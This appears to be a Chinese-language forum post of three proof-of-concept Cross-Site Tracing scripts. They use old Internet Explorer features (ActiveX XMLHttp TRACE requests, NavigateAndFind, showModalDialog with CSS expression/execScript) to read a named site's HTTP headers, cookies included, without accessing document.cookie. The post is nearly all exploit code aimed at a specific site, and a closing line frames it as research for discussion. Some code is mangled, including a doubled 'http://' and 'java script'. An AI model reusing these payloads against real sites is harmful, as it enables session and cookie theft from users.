<SCRIPT type=text/java script>
<!--
function xssTRACE(){
var xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");
xmlHttp.open(\"TRACE\",\"[url]http://wmjie.51.net/swords/[/url]\",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
手法2:
<SCRIPT type=text/java script>
<!--
function xssTRACE() {
var openWin=open(\"blank.htm\",\"swords\",\"width=500,height=400\");
var otraceswords=openWin.external;
openWin.location.href=\"[url]http://wmjie.51.net/swords/[/url]\";
setTimeout(
function () {
//以下必须写在一行
otraceswords.NavigateAndFind('java script:xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\",\"[url]http://wmjie.51.net/swords/[/url]\",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(\"不用document.cookie 显示站点wmjie.51.net/swords/ 的头信息。\\n\" + xmlDoc);',\"\",\"\");
},
1024
);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
手法3:
<SCRIPT type=text/java script>
function xssTRACE(){
var swords = \"var xmlHttp = new ActiveXObject(\\"Microsoft.XMLHTTP\\")\;xmlHttp.open(\\"TRACE\\",\\"[url]http://http://www.tingh.com/[/url]\\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;\";
var target = \"[url]http://wmjie.51.net/swords/[/url]\";
spinach = encodeURIComponent(swords + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))';
showModalDialog(target, null, readyCode);
}
</SCRIPT>
<BR><INPUT onclick=xssTRACE() type=button value=\"XSS TRACE\">
后记:研究阶段,希望能抛砖引玉,期望和您能够交流心得体会。
